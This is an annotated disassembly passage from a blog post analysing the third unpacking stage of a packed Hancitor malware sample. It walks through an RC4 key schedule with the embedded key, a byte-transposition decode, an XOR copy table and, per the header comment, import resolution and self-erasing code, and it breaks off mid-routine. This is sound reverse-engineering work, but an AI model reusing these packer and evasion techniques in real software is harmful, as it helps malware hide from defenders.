Module three inside the packed Hancitor sample with SHA1 37f6f1f59bf7952fd7182deeb07d4cd0d367dd59
The disassembly output below is part of the blog post "Hancitor packer demystified". If you landed here via Google, you probably want to go to the home page instead.
debug028:002303D7 ; ---------------------------------------------------------------------------
debug028:002303D7
debug028:002303D7 loc_2303D7:                             ; CODE XREF: my_module_2+3D3↑j
debug028:002303D7 50                                      push    eax
debug028:002303D8 8B 85 4C FF FF FF                       mov     eax, [ebp+var_B4]
debug028:002303DE FF E0                                   jmp     eax             ; tail of my_module_2; its body starts before this listing
debug028:002303DE                                         my_module_2 endp ; sp-analysis failed
debug028:002303DE
debug028:002303DE ; ---------------------------------------------------------------------------
debug028:002303E0 88 BA C5 70                             dd 70C5BA88h    ; 4 bytes between the two modules; nothing in this listing references them
debug028:002303E4
debug028:002303E4 ; =============== S U B R O U T I N E =======================================
debug028:002303E4
debug028:002303E4
debug028:002303E4 my_module_3 proc near                   ; DATA XREF: debug007:0018FED4↑o
debug028:002303E4 ; Stage three of the packer as captured in this dump. Read top to bottom it:
debug028:002303E4 ;  1. moves three blobs around inside the image (base = dword_400000) with memcpy;
debug028:002303E4 ;  2. builds a 256-byte state table at [ebp-208h] from the 16-byte key stored at
debug028:002303E4 ;     dword_230455 -- the key-schedule loop and the output loop below match RC4;
debug028:002303E4 ;  3. draws 4 keystream bytes per step to build a permutation of 0..934Dh and
debug028:002303E4 ;     reorders the 934Eh bytes at 401000h through a temporary copy (a byte
debug028:002303E4 ;     transposition, not a XOR stream);
debug028:002303E4 ;  4. walks a 16-byte-per-entry table at 40679Fh, copying (and XORing with 4) or
debug028:002303E4 ;     filling ranges of an 8000h scratch buffer, then memcpy's the buffer back
debug028:002303E4 ;     over 401000h;
debug028:002303E4 ;  5. resolves imports from the descriptor table at 406A98h (GetModuleHandleA /
debug028:002303E4 ;     LoadLibraryA, GetProcAddress by ordinal or by name) into the IAT;
debug028:002303E4 ;  6. rewrites the in-memory PE header (NumberOfSections, AddressOfEntryPoint,
debug028:002303E4 ;     import / IAT / relocation directories) and copies a 4-entry section table;
debug028:002303E4 ;  7. calls OutputDebugString("ZxkenpZ"), zeroes its own code region downward to
debug028:002303E4 ;     [ebp-5Ch], then leaves and jumps to sub_4015F0.
debug028:002303E4 ; Stack slots used below (names are mine, offsets are what the code uses):
debug028:002303E4 ;   [ebp-208h] 256-byte state table S        [ebp-8]    i (loop index / RC4 i)
debug028:002303E4 ;   [ebp-18h]  RC4 j                         [ebp-9]    swap temp
debug028:002303E4 ;   [ebp-0C4h] key pointer (dword_230455)    [ebp-0BCh] key length (10h)
debug028:002303E4 ;   [ebp-94h]  401000h, region being decoded [ebp-2Ch]  its length, 934Eh
debug028:002303E4 ;   [ebp-40h]  dword pool 0..n-1             [ebp-7Ch]  permutation table
debug028:002303E4 ;   [ebp-74h]  temp copy of the region       [ebp-34h]  8000h scratch buffer
debug028:002303E4 ;   [ebp-14h]  cursor over the table at 40679Fh
debug028:002303E4 ;   [ebp-38h]  cursor over import descriptors at 406A98h; [ebp-3Ch] thunk cursor
debug028:002303E4 ;   [ebp-20h]  NT header address             [ebp-0FCh] sub_4015F0 (next stage)
debug028:002303E4 ; Slots only read here ([ebp-30h], -48h, -50h, -8Ch, -90h, -0CCh, -28h, -0F4h,
debug028:002303E4 ; -5Ch) were filled in before this module; the analyst's "; call xxx" labels
debug028:002303E4 ; name the function pointers and are relied on in the comments below.
debug028:002303E4 58                                      pop     eax             ; drop the value my_module_2 pushed right before its jmp eax
debug028:002303E5 68 14 05 00 00                          push    514h            ; memcpy #1, size 514h
debug028:002303EA BA B6 B3 00 00                          mov     edx, 0B3B6h
debug028:002303EF 81 C2 00 00 40 00                       add     edx, offset dword_400000 ; src = base + 0B3B6h
debug028:002303F5 52                                      push    edx
debug028:002303F6 B8 6D 26 00 00                          mov     eax, 266Dh
debug028:002303FB 05 00 00 40 00                          add     eax, offset dword_400000 ; dst = base + 266Dh
debug028:00230400 50                                      push    eax
debug028:00230401 FF 55 D0                                call    dword ptr [ebp-30h] ; call memcpy (cdecl; pushed size, src, dst)
debug028:00230404 83 C4 0C                                add     esp, 0Ch        ; caller pops the 3 args
debug028:00230407 68 E8 03 00 00                          push    3E8h            ; memcpy #2, size 3E8h
debug028:0023040C B9 CE AF 00 00                          mov     ecx, 0AFCEh
debug028:00230411 81 C1 00 00 40 00                       add     ecx, offset dword_400000 ; src = base + 0AFCEh
debug028:00230417 51                                      push    ecx
debug028:00230418 BA 77 51 00 00                          mov     edx, 5177h
debug028:0023041D 81 C2 00 00 40 00                       add     edx, offset dword_400000 ; dst = base + 5177h
debug028:00230423 52                                      push    edx
debug028:00230424 FF 55 D0                                call    dword ptr [ebp-30h] ; call memcpy
debug028:00230427 83 C4 0C                                add     esp, 0Ch
debug028:0023042A 68 80 0C 00 00                          push    0C80h           ; memcpy #3, size 0C80h
debug028:0023042F B8 4E A3 00 00                          mov     eax, 0A34Eh
debug028:00230434 05 00 00 40 00                          add     eax, offset dword_400000 ; src = base + 0A34Eh
debug028:00230439 50                                      push    eax
debug028:0023043A B9 A1 87 00 00                          mov     ecx, 87A1h
debug028:0023043F 81 C1 00 00 40 00                       add     ecx, offset dword_400000 ; dst = base + 87A1h
debug028:00230445 51                                      push    ecx
debug028:00230446 FF 55 D0                                call    dword ptr [ebp-30h] ; call memcpy
debug028:00230449 83 C4 0C                                add     esp, 0Ch
debug028:0023044C 50                                      push    eax             ; save eax around the get-pc trick
debug028:0023044D E8 00 00 00 00                          call    $+5             ; pushes 230452h ...
debug028:00230452 58                                      pop     eax             ; ... so eax = 230452h (position-independent address of this spot)
debug028:00230453 EB 10                                   jmp     short loc_230465 ; skip over the 16 key bytes that follow
debug028:00230453 ; ---------------------------------------------------------------------------
debug028:00230455 A7 68 FD 23                             dword_230455 dd 23FD68A7h ; 16-byte RC4 key, consumed byte-wise in memory order (A7 68 FD 23 ...)
debug028:00230459 1E A3 B9 CF                             dd 0CFB9A31Eh
debug028:0023045D 68 E5 DE EF                             dd 0EFDEE568h
debug028:00230461 C1 AD E1 34                             dword_230461 dd 34E1ADC1h
debug028:00230465 ; ---------------------------------------------------------------------------
debug028:00230465
debug028:00230465 loc_230465:                             ; CODE XREF: my_module_3+6F↑j
debug028:00230465 83 C0 03                                add     eax, 3          ; 230452h + 3 = 230455h = dword_230455 (pop is 1 byte, jmp short is 2)
debug028:00230468
debug028:00230468 loc_230468:
debug028:00230468 89 85 3C FF FF FF                       mov     [ebp-0C4h], eax ; key pointer
debug028:0023046E 58                                      pop     eax             ; restore eax
debug028:0023046F C7 85 44 FF FF FF 10 00 00 00           mov     dword ptr [ebp-0BCh], 10h ; key length = 16
debug028:00230479 BA 00 10 00 00                          mov     edx, 1000h
debug028:0023047E 81 C2 00 00 40 00                       add     edx, offset dword_400000
debug028:00230484 89 95 6C FF FF FF                       mov     [ebp-94h], edx  ; region to decode = base + 1000h
debug028:0023048A C7 45 D4 4E 93 00 00                    mov     dword ptr [ebp-2Ch], 934Eh ; region length n = 934Eh
debug028:00230491 C7 45 F8 00 00 00 00                    mov     dword ptr [ebp-8], 0 ; i = 0
debug028:00230498 EB 09                                   jmp     short loc_2304A3
debug028:0023049A ; ---------------------------------------------------------------------------
debug028:0023049A
debug028:0023049A create_value_range_0_to_ff:             ; CODE XREF: my_module_3+D5↓j
debug028:0023049A 8B 45 F8                                mov     eax, [ebp-8]
debug028:0023049D 83 C0 01                                add     eax, 1
debug028:002304A0 89 45 F8                                mov     [ebp-8], eax    ; i++
debug028:002304A3
debug028:002304A3 loc_2304A3:                             ; CODE XREF: my_module_3+B4↑j
debug028:002304A3 81 7D F8 00 01 00 00                    cmp     dword ptr [ebp-8], 100h
debug028:002304AA 74 0F                                   jz      short loc_2304BB ; for i in 0..255
debug028:002304AC 8B 4D F8                                mov     ecx, [ebp-8]
debug028:002304AF 8A 55 F8                                mov     dl, [ebp-8]
debug028:002304B2 88 94 0D F8 FD FF FF                    mov     [ebp+ecx-208h], dl ; S[i] = i  (identity table, RC4 KSA step 1)
debug028:002304B9 EB DF                                   jmp     short create_value_range_0_to_ff
debug028:002304BB ; ---------------------------------------------------------------------------
debug028:002304BB
debug028:002304BB loc_2304BB:                             ; CODE XREF: my_module_3+C6↑j
debug028:002304BB C7 45 E8 00 00 00 00                    mov     dword ptr [ebp-18h], 0 ; j = 0
debug028:002304C2 8B 45 E8                                mov     eax, [ebp-18h]
debug028:002304C5 89 45 F8                                mov     [ebp-8], eax    ; i = 0
debug028:002304C8 EB 09                                   jmp     short loc_2304D3
debug028:002304CA ; ---------------------------------------------------------------------------
debug028:002304CA
debug028:002304CA fiddle_value_range_with_key:            ; CODE XREF: my_module_3+157↓j
debug028:002304CA 8B 4D F8                                mov     ecx, [ebp-8]
debug028:002304CD 83 C1 01                                add     ecx, 1
debug028:002304D0 89 4D F8                                mov     [ebp-8], ecx    ; i++
debug028:002304D3
debug028:002304D3 loc_2304D3:                             ; CODE XREF: my_module_3+E4↑j
debug028:002304D3 81 7D F8 00 01 00 00                    cmp     dword ptr [ebp-8], 100h
debug028:002304DA 74 61                                   jz      short loc_23053D ; for i in 0..255  (RC4 key schedule)
debug028:002304DC 8B 45 F8                                mov     eax, [ebp-8]
debug028:002304DF 33 D2                                   xor     edx, edx
debug028:002304E1 F7 B5 44 FF FF FF                       div     dword ptr [ebp-0BCh] ; edx = i % keylen
debug028:002304E7 8B 85 3C FF FF FF                       mov     eax, [ebp-0C4h]
debug028:002304ED 0F B6 04 10                             movzx   eax, byte ptr [eax+edx] ; key[i % keylen]
debug028:002304F1 03 45 E8                                add     eax, [ebp-18h]  ; + j
debug028:002304F4 8B 4D F8                                mov     ecx, [ebp-8]
debug028:002304F7 0F B6 94 0D F8 FD FF FF                 movzx   edx, byte ptr [ebp+ecx-208h] ; S[i]
debug028:002304FF 03 C2                                   add     eax, edx        ; j + S[i] + key[i % keylen]
debug028:00230501 33 D2                                   xor     edx, edx
debug028:00230503 B9 00 01 00 00                          mov     ecx, 100h
debug028:00230508 F7 F1                                   div     ecx
debug028:0023050A 89 55 E8                                mov     [ebp-18h], edx  ; j = (...) % 256
debug028:0023050D 8B 55 F8                                mov     edx, [ebp-8]
debug028:00230510 8A 84 15 F8 FD FF FF                    mov     al, [ebp+edx-208h]
debug028:00230517 88 45 F7                                mov     [ebp-9], al     ; tmp = S[i]
debug028:0023051A 8B 4D F8                                mov     ecx, [ebp-8]
debug028:0023051D 8B 55 E8                                mov     edx, [ebp-18h]
debug028:00230520 8A 84 15 F8 FD FF FF                    mov     al, [ebp+edx-208h]
debug028:00230527 88 84 0D F8 FD FF FF                    mov     [ebp+ecx-208h], al ; S[i] = S[j]
debug028:0023052E 8B 4D E8                                mov     ecx, [ebp-18h]
debug028:00230531 8A 55 F7                                mov     dl, [ebp-9]
debug028:00230534 88 94 0D F8 FD FF FF                    mov     [ebp+ecx-208h], dl ; S[j] = tmp   (swap done)
debug028:0023053B EB 8D                                   jmp     short fiddle_value_range_with_key
debug028:0023053D ; ---------------------------------------------------------------------------
debug028:0023053D
debug028:0023053D loc_23053D:                             ; CODE XREF: my_module_3+F6↑j
debug028:0023053D C7 45 E8 00 00 00 00                    mov     dword ptr [ebp-18h], 0 ; j = 0
debug028:00230544 8B 45 E8                                mov     eax, [ebp-18h]
debug028:00230547 89 45 F8                                mov     [ebp-8], eax    ; i = 0  (RC4 output state reset)
debug028:0023054A 6A 04                                   push    4               ; PAGE_READWRITE
debug028:0023054C 68 00 10 00 00                          push    1000h           ; MEM_COMMIT
debug028:00230551 8B 4D D4                                mov     ecx, [ebp-2Ch]
debug028:00230554 C1 E1 02                                shl     ecx, 2
debug028:00230557 51                                      push    ecx             ; size = n * 4
debug028:00230558 6A 00                                   push    0               ; lpAddress = NULL
debug028:0023055A FF 55 B8                                call    dword ptr [ebp-48h] ; call virtualalloc
debug028:0023055D 89 45 C0                                mov     [ebp-40h], eax  ; pool = VirtualAlloc(NULL, n*4, MEM_COMMIT, PAGE_READWRITE)
debug028:00230560 C7 45 FC 00 00 00 00                    mov     dword ptr [ebp-4], 0 ; k = 0
debug028:00230567 EB 09                                   jmp     short loc_230572
debug028:00230569 ; ---------------------------------------------------------------------------
debug028:00230569
debug028:00230569 loc_230569:                             ; CODE XREF: my_module_3+1A2↓j
debug028:00230569 8B 55 FC                                mov     edx, [ebp-4]
debug028:0023056C 83 C2 01                                add     edx, 1
debug028:0023056F 89 55 FC                                mov     [ebp-4], edx    ; k++
debug028:00230572
debug028:00230572 loc_230572:                             ; CODE XREF: my_module_3+183↑j
debug028:00230572 8B 45 FC                                mov     eax, [ebp-4]
debug028:00230575 3B 45 D4                                cmp     eax, [ebp-2Ch]
debug028:00230578 73 0E                                   jnb     short loc_230588 ; for k in 0..n-1
debug028:0023057A 8B 4D FC                                mov     ecx, [ebp-4]
debug028:0023057D 8B 55 C0                                mov     edx, [ebp-40h]
debug028:00230580 8B 45 FC                                mov     eax, [ebp-4]
debug028:00230583 89 04 8A                                mov     [edx+ecx*4], eax ; pool[k] = k
debug028:00230586 EB E1                                   jmp     short loc_230569
debug028:00230588 ; ---------------------------------------------------------------------------
debug028:00230588
debug028:00230588 loc_230588:                             ; CODE XREF: my_module_3+194↑j
debug028:00230588 6A 04                                   push    4               ; PAGE_READWRITE
debug028:0023058A 68 00 10 00 00                          push    1000h           ; MEM_COMMIT
debug028:0023058F 8B 4D D4                                mov     ecx, [ebp-2Ch]
debug028:00230592 C1 E1 02                                shl     ecx, 2
debug028:00230595 51                                      push    ecx             ; size = n * 4
debug028:00230596 6A 00                                   push    0
debug028:00230598 FF 55 B8                                call    dword ptr [ebp-48h] ; call virtualalloc
debug028:0023059B 89 45 84                                mov     [ebp-7Ch], eax  ; perm = second n-dword buffer
debug028:0023059E C7 45 FC 00 00 00 00                    mov     dword ptr [ebp-4], 0 ; k = 0
debug028:002305A5 EB 09                                   jmp     short loc_2305B0
debug028:002305A7 ; ---------------------------------------------------------------------------
debug028:002305A7
debug028:002305A7 loc_2305A7:                             ; CODE XREF: my_module_3+2C9↓j
debug028:002305A7 8B 55 FC                                mov     edx, [ebp-4]
debug028:002305AA 83 C2 01                                add     edx, 1
debug028:002305AD 89 55 FC                                mov     [ebp-4], edx    ; k++
debug028:002305B0
debug028:002305B0 loc_2305B0:                             ; CODE XREF: my_module_3+1C1↑j
debug028:002305B0 8B 45 FC                                mov     eax, [ebp-4]
debug028:002305B3 3B 45 D4                                cmp     eax, [ebp-2Ch]
debug028:002305B6 0F 83 F6 00 00 00                       jnb     loc_2306B2      ; for k in 0..n-1: build perm[k]
debug028:002305BC 8B 4D D4                                mov     ecx, [ebp-2Ch]
debug028:002305BF 2B 4D FC                                sub     ecx, [ebp-4]
debug028:002305C2 89 4D 94                                mov     [ebp-6Ch], ecx  ; rem = n - k  (entries still unpicked in pool)
debug028:002305C5 C7 45 E4 00 00 00 00                    mov     dword ptr [ebp-1Ch], 0 ; b = 0
debug028:002305CC EB 09                                   jmp     short loc_2305D7
debug028:002305CE ; ---------------------------------------------------------------------------
debug028:002305CE
debug028:002305CE loc_2305CE:                             ; CODE XREF: my_module_3+284↓j
debug028:002305CE 8B 55 E4                                mov     edx, [ebp-1Ch]
debug028:002305D1 83 C2 01                                add     edx, 1
debug028:002305D4 89 55 E4                                mov     [ebp-1Ch], edx  ; b++
debug028:002305D7
debug028:002305D7 loc_2305D7:                             ; CODE XREF: my_module_3+1E8↑j
debug028:002305D7 83 7D E4 04                             cmp     dword ptr [ebp-1Ch], 4
debug028:002305DB 0F 83 8C 00 00 00                       jnb     loc_23066D      ; for b in 0..3: one RC4 output byte each, collected into the dword at [ebp-80h]
debug028:002305E1 8B 45 F8                                mov     eax, [ebp-8]
debug028:002305E4 83 C0 01                                add     eax, 1
debug028:002305E7 33 D2                                   xor     edx, edx
debug028:002305E9 B9 00 01 00 00                          mov     ecx, 100h
debug028:002305EE F7 F1                                   div     ecx
debug028:002305F0 89 55 F8                                mov     [ebp-8], edx    ; i = (i + 1) % 256
debug028:002305F3 8B 55 F8                                mov     edx, [ebp-8]
debug028:002305F6 0F B6 84 15 F8 FD FF FF                 movzx   eax, byte ptr [ebp+edx-208h] ; S[i]
debug028:002305FE 03 45 E8                                add     eax, [ebp-18h]  ; + j
debug028:00230601 33 D2                                   xor     edx, edx
debug028:00230603 B9 00 01 00 00                          mov     ecx, 100h
debug028:00230608 F7 F1                                   div     ecx
debug028:0023060A 89 55 E8                                mov     [ebp-18h], edx  ; j = (j + S[i]) % 256
debug028:0023060D 8B 55 E8                                mov     edx, [ebp-18h]
debug028:00230610 8A 84 15 F8 FD FF FF                    mov     al, [ebp+edx-208h]
debug028:00230617 88 45 F7                                mov     [ebp-9], al     ; tmp = S[j]
debug028:0023061A 8B 4D E8                                mov     ecx, [ebp-18h]
debug028:0023061D 8B 55 F8                                mov     edx, [ebp-8]
debug028:00230620 8A 84 15 F8 FD FF FF                    mov     al, [ebp+edx-208h]
debug028:00230627 88 84 0D F8 FD FF FF                    mov     [ebp+ecx-208h], al ; S[j] = S[i]
debug028:0023062E 8B 4D F8                                mov     ecx, [ebp-8]
debug028:00230631 8A 55 F7                                mov     dl, [ebp-9]
debug028:00230634 88 94 0D F8 FD FF FF                    mov     [ebp+ecx-208h], dl ; S[i] = tmp   (swap done)
debug028:0023063B 0F B6 45 F7                             movzx   eax, byte ptr [ebp-9] ; S[i] (new)
debug028:0023063F 8B 4D E8                                mov     ecx, [ebp-18h]
debug028:00230642 0F B6 94 0D F8 FD FF FF                 movzx   edx, byte ptr [ebp+ecx-208h] ; S[j] (new)
debug028:0023064A 03 C2                                   add     eax, edx        ; S[i] + S[j]
debug028:0023064C 25 FF 00 00 80                          and     eax, 800000FFh  ; compiler idiom for a signed % 256 ...
debug028:00230651 79 07                                   jns     short loc_23065A ; ... both operands are zero-extended bytes, so the
debug028:00230653 48                                      dec     eax             ; ... sign fix-up below is never taken in practice
debug028:00230654 0D 00 FF FF FF                          or      eax, 0FFFFFF00h
debug028:00230659 40                                      inc     eax
debug028:0023065A
debug028:0023065A loc_23065A:                             ; CODE XREF: my_module_3+26D↑j
debug028:0023065A 8B 4D E4                                mov     ecx, [ebp-1Ch]
debug028:0023065D 8A 94 05 F8 FD FF FF                    mov     dl, [ebp+eax-208h] ; keystream byte = S[(S[i] + S[j]) % 256]
debug028:00230664 88 54 0D 80                             mov     [ebp+ecx-80h], dl ; store as byte b of the 4-byte draw
debug028:00230668 E9 61 FF FF FF                          jmp     loc_2305CE
debug028:0023066D ; ---------------------------------------------------------------------------
debug028:0023066D
debug028:0023066D loc_23066D:                             ; CODE XREF: my_module_3+1F7↑j
debug028:0023066D 8B 45 80                                mov     eax, [ebp-80h]  ; r = the 4 keystream bytes read as a little-endian dword
debug028:00230670 3B 45 94                                cmp     eax, [ebp-6Ch]
debug028:00230673 72 0D                                   jb      short loc_230682 ; idx = r < rem ? r : r % rem
debug028:00230675 8B 45 80                                mov     eax, [ebp-80h]
debug028:00230678 33 D2                                   xor     edx, edx
debug028:0023067A F7 75 94                                div     dword ptr [ebp-6Ch]
debug028:0023067D 89 55 9C                                mov     [ebp-64h], edx  ; idx = r % rem
debug028:00230680 EB 06                                   jmp     short loc_230688
debug028:00230682 ; ---------------------------------------------------------------------------
debug028:00230682
debug028:00230682 loc_230682:                             ; CODE XREF: my_module_3+28F↑j
debug028:00230682 8B 4D 80                                mov     ecx, [ebp-80h]
debug028:00230685 89 4D 9C                                mov     [ebp-64h], ecx  ; idx = r
debug028:00230688
debug028:00230688 loc_230688:                             ; CODE XREF: my_module_3+29C↑j
debug028:00230688 8B 55 FC                                mov     edx, [ebp-4]
debug028:0023068B 8B 45 84                                mov     eax, [ebp-7Ch]
debug028:0023068E 8B 4D 9C                                mov     ecx, [ebp-64h]
debug028:00230691 8B 75 C0                                mov     esi, [ebp-40h]
debug028:00230694 8B 0C 8E                                mov     ecx, [esi+ecx*4]
debug028:00230697 89 0C 90                                mov     [eax+edx*4], ecx ; perm[k] = pool[idx]
debug028:0023069A 8B 55 9C                                mov     edx, [ebp-64h]
debug028:0023069D 8B 45 C0                                mov     eax, [ebp-40h]
debug028:002306A0 8B 4D 94                                mov     ecx, [ebp-6Ch]
debug028:002306A3 8B 75 C0                                mov     esi, [ebp-40h]
debug028:002306A6 8B 4C 8E FC                             mov     ecx, [esi+ecx*4-4]
debug028:002306AA 89 0C 90                                mov     [eax+edx*4], ecx ; pool[idx] = pool[rem-1]  (picked entry replaced by the last unpicked one, so perm is a permutation of 0..n-1)
debug028:002306AD E9 F5 FE FF FF                          jmp     loc_2305A7
debug028:002306B2 ; ---------------------------------------------------------------------------
debug028:002306B2
debug028:002306B2 loc_2306B2:                             ; CODE XREF: my_module_3+1D2↑j
debug028:002306B2 68 00 80 00 00                          push    8000h           ; MEM_RELEASE
debug028:002306B7 6A 00                                   push    0
debug028:002306B9 8B 55 C0                                mov     edx, [ebp-40h]
debug028:002306BC 52                                      push    edx
debug028:002306BD FF 55 B0                                call    dword ptr [ebp-50h] ; call virtualfree  (pool no longer needed)
debug028:002306C0 6A 04                                   push    4               ; PAGE_READWRITE
debug028:002306C2 68 00 10 00 00                          push    1000h           ; MEM_COMMIT
debug028:002306C7 8B 45 C8                                mov     eax, [ebp-2Ch]
debug028:002306CA 50                                      push    eax             ; size = n bytes
debug028:002306CB 6A 00                                   push    0
debug028:002306CD FF 55 B8                                call    dword ptr [ebp-48h] ; call virtualalloc
debug028:002306D0 89 45 8C                                mov     [ebp-74h], eax  ; tmp = n-byte buffer
debug028:002306D3 8B 4D D4                                mov     ecx, [ebp-2Ch]
debug028:002306D6 51                                      push    ecx             ; size n
debug028:002306D7 8B 95 6C FF FF FF                       mov     edx, [ebp-94h]
debug028:002306DD 52                                      push    edx             ; src = 401000h
debug028:002306DE 8B 45 8C                                mov     eax, [ebp-74h]
debug028:002306E1 50                                      push    eax             ; dst = tmp
debug028:002306E2
debug028:002306E2 copy_encrypted_bytes_to_buffer_region:  ; call memcpy
debug028:002306E2 FF 55 D0                                call    dword ptr [ebp-30h] ; tmp = copy of the scrambled region
debug028:002306E5 83 C4 0C                                add     esp, 0Ch
debug028:002306E8 C7 45 FC 00 00 00 00                    mov     dword ptr [ebp-4], 0 ; k = 0
debug028:002306EF EB 09                                   jmp     short loc_2306FA
debug028:002306F1 ; ---------------------------------------------------------------------------
debug028:002306F1
debug028:002306F1 loc_2306F1:                             ; CODE XREF: my_module_3+338↓j
debug028:002306F1 8B 4D FC                                mov     ecx, [ebp-4]
debug028:002306F4 83 C1 01                                add     ecx, 1
debug028:002306F7 89 4D FC                                mov     [ebp-4], ecx    ; k++
debug028:002306FA
debug028:002306FA loc_2306FA:                             ; CODE XREF: my_module_3+30B↑j
debug028:002306FA 8B 55 FC                                mov     edx, [ebp-4]
debug028:002306FD 3B 55 D4                                cmp     edx, [ebp-2Ch]
debug028:00230700 73 1C                                   jnb     short loc_23071E ; for k in 0..n-1
debug028:00230702 8B 45 FC                                mov     eax, [ebp-4]
debug028:00230705 8B 4D 84                                mov     ecx, [ebp-7Ch]
debug028:00230708 8B 14 81                                mov     edx, [ecx+eax*4] ; perm[k]
debug028:0023070B 8B 45 8C                                mov     eax, [ebp-74h]
debug028:0023070E 03 45 FC                                add     eax, [ebp-4]
debug028:00230711 8B 8D 6C FF FF FF                       mov     ecx, [ebp-94h]
debug028:00230717 8A 00                                   mov     al, [eax]       ; tmp[k]
debug028:00230719 88 04 11                                mov     [ecx+edx], al   ; region[perm[k]] = tmp[k]  (byte transposition in place)
debug028:0023071C EB D3                                   jmp     short loc_2306F1
debug028:0023071E ; ---------------------------------------------------------------------------
debug028:0023071E
debug028:0023071E loc_23071E:                             ; CODE XREF: my_module_3+31C↑j
debug028:0023071E 68 00 80 00 00                          push    8000h           ; MEM_RELEASE
debug028:00230723 6A 00                                   push    0
debug028:00230725 8B 4D 8C                                mov     ecx, [ebp-74h]
debug028:00230728 51                                      push    ecx
debug028:00230729 FF 55 B0                                call    dword ptr [ebp-50h] ; call virtualfree  (tmp)
debug028:0023072C 68 00 80 00 00                          push    8000h
debug028:00230731 6A 00                                   push    0
debug028:00230733 8B 55 84                                mov     edx, [ebp-7Ch]
debug028:00230736 52                                      push    edx
debug028:00230737 FF 55 B0                                call    dword ptr [ebp-50h] ; call virtualfree  (perm)
debug028:0023073A 6A 04                                   push    4               ; PAGE_READWRITE
debug028:0023073C 68 00 10 00 00                          push    1000h           ; MEM_COMMIT
debug028:00230741 68 00 80 00 00                          push    8000h           ; size 8000h
debug028:00230746 6A 00                                   push    0
debug028:00230748 FF 55 B8                                call    dword ptr [ebp-48h] ; call virtualalloc
debug028:0023074B 89 45 CC                                mov     [ebp-34h], eax  ; scratch = 8000h-byte buffer; offset x in it mirrors RVA x+1000h
debug028:0023074E 68 00 80 00 00                          push    8000h           ; size
debug028:00230753 6A 00                                   push    0               ; value 0
debug028:00230755 8B 45 CC                                mov     eax, [ebp-34h]
debug028:00230758 50                                      push    eax
debug028:00230759 FF 95 74 FF FF FF                       call    dword ptr [ebp-8Ch] ; call memset  (memset(scratch, 0, 8000h))
debug028:0023075F 83 C4 0C                                add     esp, 0Ch
debug028:00230762 B9 9F 67 00 00                          mov     ecx, 679Fh
debug028:00230767 81 C1 00 00 40 00                       add     ecx, offset dword_400000
debug028:0023076D 89 4D EC                                mov     [ebp-14h], ecx  ; e = base + 679Fh; 16-byte entries {+0 src RVA or 0, +4 dst RVA, +8 size, +0Ch fill byte}
debug028:00230770
debug028:00230770 loc_230770:                             ; CODE XREF: my_module_3+448↓j
debug028:00230770 8B 55 EC                                mov     edx, [ebp-14h]
debug028:00230773 83 7A 04 00                             cmp     dword ptr [edx+4], 0
debug028:00230777 75 05                                   jnz     short loc_23077E
debug028:00230779 E9 B3 00 00 00                          jmp     loc_230831      ; dst RVA of 0 terminates the table
debug028:0023077E ; ---------------------------------------------------------------------------
debug028:0023077E
debug028:0023077E loc_23077E:                             ; CODE XREF: my_module_3+393↑j
debug028:0023077E 8B 45 EC                                mov     eax, [ebp-14h]
debug028:00230781 83 38 00                                cmp     dword ptr [eax], 0
debug028:00230784 74 75                                   jz      short loc_2307FB ; src == 0 -> fill instead of copy
debug028:00230786 8B 4D EC                                mov     ecx, [ebp-14h]
debug028:00230789 8B 51 08                                mov     edx, [ecx+8]
debug028:0023078C 52                                      push    edx             ; size = e.size
debug028:0023078D 8B 45 EC                                mov     eax, [ebp-14h]
debug028:00230790 8B 08                                   mov     ecx, [eax]
debug028:00230792 81 C1 00 00 40 00                       add     ecx, offset dword_400000
debug028:00230798 51                                      push    ecx             ; src = base + e.src
debug028:00230799 8B 55 EC                                mov     edx, [ebp-14h]
debug028:0023079C 8B 42 04                                mov     eax, [edx+4]
debug028:0023079F 8B 4D CC                                mov     ecx, [ebp-34h]
debug028:002307A2 8D 94 01 00 F0 FF FF                    lea     edx, [ecx+eax-1000h]
debug028:002307A9 52                                      push    edx             ; dst = scratch + e.dst - 1000h
debug028:002307AA FF 55 D0                                call    dword ptr [ebp-30h] ; call memcpy
debug028:002307AD 83 C4 0C                                add     esp, 0Ch
debug028:002307B0 C7 45 BC 00 00 00 00                    mov     dword ptr [ebp-44h], 0 ; m = 0
debug028:002307B7 EB 09                                   jmp     short loc_2307C2
debug028:002307B9 ; ---------------------------------------------------------------------------
debug028:002307B9
debug028:002307B9 loc_2307B9:                             ; CODE XREF: my_module_3+413↓j
debug028:002307B9 8B 45 BC                                mov     eax, [ebp-44h]
debug028:002307BC 83 C0 01                                add     eax, 1
debug028:002307BF 89 45 BC                                mov     [ebp-44h], eax  ; m++
debug028:002307C2
debug028:002307C2 loc_2307C2:                             ; CODE XREF: my_module_3+3D3↑j
debug028:002307C2 8B 4D EC                                mov     ecx, [ebp-14h]
debug028:002307C5 8B 55 BC                                mov     edx, [ebp-44h]
debug028:002307C8 3B 51 08                                cmp     edx, [ecx+8]
debug028:002307CB 73 2C                                   jnb     short loc_2307F9 ; for m in 0..e.size-1
debug028:002307CD 8B 45 EC                                mov     eax, [ebp-14h]
debug028:002307D0 8B 4D CC                                mov     ecx, [ebp-34h]
debug028:002307D3 03 48 04                                add     ecx, [eax+4]
debug028:002307D6 8B 55 BC                                mov     edx, [ebp-44h]
debug028:002307D9 0F B6 84 11 00 F0 FF FF                 movzx   eax, byte ptr [ecx+edx-1000h]
debug028:002307E1 83 F0 04                                xor     eax, 4          ; every copied byte is XORed with the constant 4
debug028:002307E4 8B 4D EC                                mov     ecx, [ebp-14h]
debug028:002307E7 8B 55 CC                                mov     edx, [ebp-34h]
debug028:002307EA 03 51 04                                add     edx, [ecx+4]
debug028:002307ED 8B 4D BC                                mov     ecx, [ebp-44h]
debug028:002307F0 88 84 0A 00 F0 FF FF                    mov     [edx+ecx-1000h], al
debug028:002307F7 EB C0                                   jmp     short loc_2307B9
debug028:002307F9 ; ---------------------------------------------------------------------------
debug028:002307F9
debug028:002307F9 loc_2307F9:                             ; CODE XREF: my_module_3+3E7↑j
debug028:002307F9 EB 28                                   jmp     short loc_230823
debug028:002307FB ; ---------------------------------------------------------------------------
debug028:002307FB
debug028:002307FB loc_2307FB:                             ; CODE XREF: my_module_3+3A0↑j
debug028:002307FB 8B 55 EC                                mov     edx, [ebp-14h]
debug028:002307FE 8B 42 08                                mov     eax, [edx+8]
debug028:00230801 50                                      push    eax             ; size = e.size
debug028:00230802 8B 4D EC                                mov     ecx, [ebp-14h]
debug028:00230805 8B 51 0C                                mov     edx, [ecx+0Ch]
debug028:00230808 52                                      push    edx             ; value = e.fill
debug028:00230809 8B 45 EC                                mov     eax, [ebp-14h]
debug028:0023080C 8B 48 04                                mov     ecx, [eax+4]
